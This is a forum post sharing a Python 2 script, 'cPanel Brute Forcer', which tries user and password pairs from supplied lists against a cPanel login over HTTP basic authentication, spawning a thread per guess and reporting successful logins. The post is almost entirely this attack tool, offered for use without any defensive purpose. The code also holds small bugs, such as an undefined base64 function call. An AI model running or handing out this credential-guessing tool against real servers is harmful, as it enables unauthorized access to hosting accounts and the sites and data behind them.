Jump to content
Ras

[Python] cPanel Brute Forcer

By Ras, in Programare

Recommended Posts

Ras Newbie

Ras

Posted
Posted 
#!usr/bin/python

import threading, time, random, sys, urllib2, httplib, base64
from copy import copy

def title():
   print "\n\t   d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0"
   print "\t-----------------------------------------------------\n"

def timer():
   now = time.localtime(time.time())
   return time.asctime(now)

if len(sys.argv) !=5:
   title()
   print "\nUsage: ./cPanelbrute.py <server> <port> <userlist> <wordlist>\n"
   print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n"
   sys.exit(1)

try:
     users = open(sys.argv[3], "r").readlines()
except(IOError):
     print "Error: Check your userlist path\n"
     sys.exit(1)

try:
     words = open(sys.argv[4], "r").readlines()
except(IOError):
     print "Error: Check your wordlist path\n"
     sys.exit(1)

wordlist = copy(words)

def reloader():
   for word in wordlist:
      words.append(word)

def getword():
   lock = threading.Lock()
   lock.acquire()
   if len(words) != 0:
      value = random.sample(words,  1)
      words.remove(value[0])      
   else:
      print "\nReloading Wordlist - Changing User\n"
      reloader()
      value = random.sample(words,  1)
      users.remove(users[0])

   lock.release()
   if len(users) ==1:
      return users[0], value[0][:-1]
   else:
      return users[0][:-1], value[0][:-1]

def getauth(url):

   req = urllib2.Request(url)
   try:
          handle = urllib2.urlopen(req)
   except IOError, e:               
          pass
   else:                               
          print "This page isn't protected by basic authentication.\n"
          sys.exit(1)

   if not hasattr(e, 'code') or e.code != 401:                 
          print "\nThis page isn't protected by basic authentication."
          print 'But we failed for another reason.\n'
          sys.exit(1)

   authline = e.headers.get('www-authenticate', '')   

   if not authline:
          print '\nA 401 error without a basic authentication response header - very weird.\n'
          sys.exit(1)
   else:
      return authline

class Worker(threading.Thread):

   def run(self):
      username, password = getword()
      try:
         print "-"*12
         print "User:",username,"Password:",password
         auth_handler = urllib2.HTTPBasicAuthHandler()
         auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1])
         opener = urllib2.build_opener(auth_handler)
         urllib2.install_opener(opener)
         urllib2.urlopen(server)
         print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"         
      except (urllib2.HTTPError, httplib.BadStatusLine), msg:
         #print "An error occurred:", msg
         pass

title()
if sys.argv[1][-1] == "/":
   sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":2082"
if sys.argv[2].isdigit() == False:
   print "[-] Port must be a number\n"
   sys.exit(1)
else:
   port = sys.argv[2]
if sys.argv[1][-1] == "/":
   sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":"+port

print "[+] Server:",server
print "[+] Port:",port
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+]",getauth(server)
print "[+] Started",timer(),"\n"

for i in range(len(words)*len(users)):
   work = Worker()
   work.setDaemon(1)
   work.start()
   time.sleep(1)
print "\n[-] Done -",timer(),"\n"

  • Thanks 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...